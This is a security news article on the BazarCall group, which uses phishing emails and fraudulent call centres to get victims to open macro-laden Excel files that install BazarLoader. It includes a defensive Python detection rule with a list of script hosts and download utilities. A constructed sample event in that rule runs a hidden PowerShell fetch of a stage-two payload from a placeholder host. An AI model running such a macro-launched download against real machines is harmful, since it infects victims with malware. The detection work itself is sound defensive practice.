Microsoft Warns BazarCall Using Call Centers For Malware Distribution

Beware of phishing emails claiming your free trial subscription is over and that urge you to call a number to cancel it before you get slugged with monthly fees. Microsoft’s cybersecurity researchers are now on the hunt for BazarCall, a criminal group that’s using call centers to infect PCs with malware called BazarLoader and BazarBackdoor – a malware loader that’s been used to distribute payloads that ultimately lead to company-wide ransomware. BazarCall (or Bazacall) actors have been active since January according to Microsoft, and were notable because they used call center operators to guide victims into installing BazarLoader onto a Windows PC. Palo Alto Networks’ Brad Duncan recently detailed the group’s techniques in a blog post. As he describes, the malware provides backdoor access to an infected Windows device: “After a client is infected, criminals use this backdoor access to send follow-up malware, scan the environment and exploit other vulnerable hosts on the network,” Duncan noted. Usually, the attack starts with phishing emails advising the victim that a trial subscription has expired and that they will be automatically charged a monthly fee unless they call a number to cancel the trial. “When recipients call the number, a fraudulent call center operated by the attackers instructs them to visit a website and download an Excel file to cancel the service. The Excel file contains a malicious macro that downloads the payload,” Microsoft Security Intelligence explains.
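The final stage of the chain described above (a downloaded Excel file whose macro launches a payload fetch) is where endpoint telemetry gives defenders a clear signal. The following detection logic is an added example, not code from the original post or from Microsoft or Binary Defense; it runs over constructed Sysmon-style process-creation records (field names mirror Sysmon Event ID 1) and flags an Office process spawning a script host, with extra weight when the document came from a Downloads folder and the child command line carries a URL.

```python
"""Flag macro-launched downloaders in process-creation telemetry (added example)."""
import re
from typing import Dict, List, Tuple

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Script hosts and system utilities a spreadsheet has no business launching.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event matches the Excel-macro stage (empty if benign)."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return []
    reasons = [f"{parent} spawned {child}"]
    if URL_RE.search(event.get("CommandLine", "")):
        reasons.append("child command line carries a URL (possible payload fetch)")
    if "\\downloads\\" in event.get("ParentCommandLine", "").lower():
        reasons.append("document was opened from a Downloads folder")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run evaluate() over a batch and keep the hits with their timestamps."""
    return [(e["UtcTime"], r) for e in events if (r := evaluate(e))]


# Constructed sample events (not real telemetry): a normal Excel launch,
# a benign Office print helper, and the macro stage firing a script host.
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
DOC = r'"EXCEL.EXE" "C:\Users\jdoe\Downloads\cancel_trial.xlsm"'
SAMPLE_EVENTS = [
    {"UtcTime": "2021-06-01 14:01:55", "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe", "Image": EXCEL, "CommandLine": DOC},
    {"UtcTime": "2021-06-01 14:02:03", "ParentImage": EXCEL, "ParentCommandLine": DOC,
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
    {"UtcTime": "2021-06-01 14:02:10", "ParentImage": EXCEL, "ParentCommandLine": DOC,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "<fetch http://payload.example.invalid/stage2>"'},
]

if __name__ == "__main__":
    for when, reasons in scan(SAMPLE_EVENTS):
        print(when, "; ".join(reasons))
```

In production the same rule is usually expressed as an EDR or SIEM query over parent/child image pairs; the URL and Downloads-folder checks are what separate this lure from ordinary Excel automation.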

Analyst Notes

Binary Defense threat researchers continue to study the threat posed by BazarCall and have seen evidence of the group’s operation from as early as November 2020 through the present time. Employee education goes a long way toward guarding against this threat, since email filtering doesn’t catch all of these messages, and the email might arrive via employees’ personal email accounts in addition to corporate email. As with any unsolicited phone call, it should be treated as suspicious. If someone receives a call, or an email requesting a call back, about a subscription ending, and that person is not familiar with said subscription, then that call is most likely some sort of scam. If a call center operator ever asks a caller to visit a website and download a file, that should be a red flag that something is not right. It is this analyst’s experience that, when canceling any subscription, not one service has asked to have a file downloaded from any website. Any file downloads that do not come from an explicitly trusted source should be treated with extreme suspicion.


Source Article: